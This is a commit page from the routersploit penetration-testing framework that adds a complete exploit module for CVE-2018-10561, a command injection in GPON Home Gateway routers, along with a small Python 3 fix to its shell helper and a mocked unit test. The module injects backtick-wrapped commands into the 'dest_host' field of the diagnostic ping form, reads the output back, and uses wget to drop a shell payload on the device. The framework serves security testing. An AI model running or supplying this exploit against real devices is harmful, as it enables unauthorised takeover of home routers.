Skip to content

R
routersploit
Unverified Commit b251580d by Marcin Bury Committed by GitHub
Options

Adding exploit for CVE-2018-10561 - GPON Home Gateway RCE (#394)

parent f9d52917
Showing with 107 additions and 2 deletions
routersploit/core/exploit/shell.py
import socket
import telnetlib
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import time
......@@ -270,7 +271,7 @@ class Communication(object):
echo_max_length = 30
size = len(self.payload)
num_parts = (size / echo_max_length) + 1
num_parts = int(size / echo_max_length) + 1
# transfer binary through echo command
print_status("Sending payload to {}".format(path))
......@@ -278,7 +279,7 @@ class Communication(object):
current = i * echo_max_length
print_status("Transferring {}/{} bytes".format(current, len(self.payload)))
block = self.payload[current:current + echo_max_length].encode("hex")
block = str(binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8")
block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2]))
cmd = echo_stream.format(block, path)
self.exploit.execute(cmd)
......
routersploit/modules/exploits/routers/multi/gpon_home_gateway_rce.py 0 → 100644
import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "GPON Home Gateway RCE",
"description": "Module exploits GPON Home Gatewa command injection vulnerability, that allows "
"executing commands on operating system level.",
"authors": (
"VPNMentor", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/",
),
"devices": (
"GPON Home Gateway",
),
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(8080, "Target HTTP port")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
shell(self, architecture="mipsbe", method="wget", location="/var/tmp/")
else:
print_error("Exploit failed - target does not seem to be vulnerable")
def execute(self, cmd):
payload = "`{cmd}`;{cmd}".format(cmd=cmd)
data = {
"XWebPageName": "diag",
"diag_action": "ping",
"wan_conlist": "0",
"dest_host": payload,
"ipv": "0"
}
self.http_request(
method="POST",
path="/GponForm/diag_Form?images/",
data=data
)
response = self.http_request(
method="GET",
path="/diag.html?images/"
)
if response:
res = re.findall(r"diag_result = \"(.*?)\\nNo traceroute test.", response.text)
if res:
return res[0].replace("\\n", "\n")
return ""
@mute
def check(self):
mark = utils.random_text(12)
cmd = "echo {}".format(mark)
response = self.execute(cmd)
if mark in response:
return True # target is vulnerable
return False # target is not vulnerable
tests/exploits/routers/multi/test_gpon_home_gateway_rce.py 0 → 100644
from unittest import mock
from flask import request
from routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce import Exploit
mark = ""
def apply_response1(*args, **kwargs):
global mark
mark = request.form["dest_host"]
return "Test", 200
def apply_response2(*args, **kwargs):
global mark
response = "diag_result = \"{}\\nNo traceroute test.".format(mark)
print(response)
return response, 200
@mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
def test_check_success(mocked_shell, target):
""" Test scenario - successful check """
route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
route_mock1.side_effect = apply_response1
route_mock2 = target.get_route_mock("/diag.html", methods=["GET"])
route_mock2.side_effect = apply_response2
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
assert exploit.check()
assert exploit.run() is None
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment